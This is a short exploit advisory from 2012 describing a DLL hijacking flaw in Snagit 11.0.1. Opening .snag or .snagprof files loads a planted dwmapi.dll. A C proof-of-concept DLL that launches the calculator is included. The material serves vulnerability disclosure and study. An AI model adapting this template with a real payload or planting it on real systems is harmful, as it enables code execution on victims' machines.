Exploit Title: Snagit 11.0.1 (dwmapi.dll) DLL Hijacking Exploit Date: 2012-08-23 Author: coolkaveh coolkaveh () rocketmail com Greets To Mohammad Morteza Sanaie sanaie.morteza () gmail com Https://twitter.com/coolkaveh Vendor Homepage: http://www.techsmith.com/ Version: 11.0.1(build93) Tested on: windows XP Sp3 ENG --------------------------------------------------------- # Vulnerable: Pixel Bender snagit32.exe & snagiteditor.exe --------------------------------------------------------- # Vulnerable extensions: .snagprof & .snag --------------------------------------------------------- # Vulnerable Dll: dwmapi.dll --------------------------------------------------------- #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; }